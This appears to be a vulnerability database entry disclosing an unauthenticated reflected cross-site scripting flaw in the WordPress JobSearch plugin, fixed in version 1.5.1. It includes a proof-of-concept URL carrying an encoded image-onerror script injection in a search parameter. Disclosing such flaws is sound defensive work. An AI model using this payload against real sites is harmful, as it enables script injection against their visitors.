WordPress Plugin Vulnerabilities

JobSearch < 1.5.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

There is a Cross-Site Scripting vulnerability in the JobSearch plugin.

Proof of Concept

https://eyecix.com/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E&ajax_filter=true&posted=all&sort-by=recent

Affects Plugins

Fixed in 1.5.1

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2020-06-03 (about 3 years ago)
Added
2020-06-03 (about 3 years ago)
Last Updated
2022-04-17 (about 2 years ago)

Other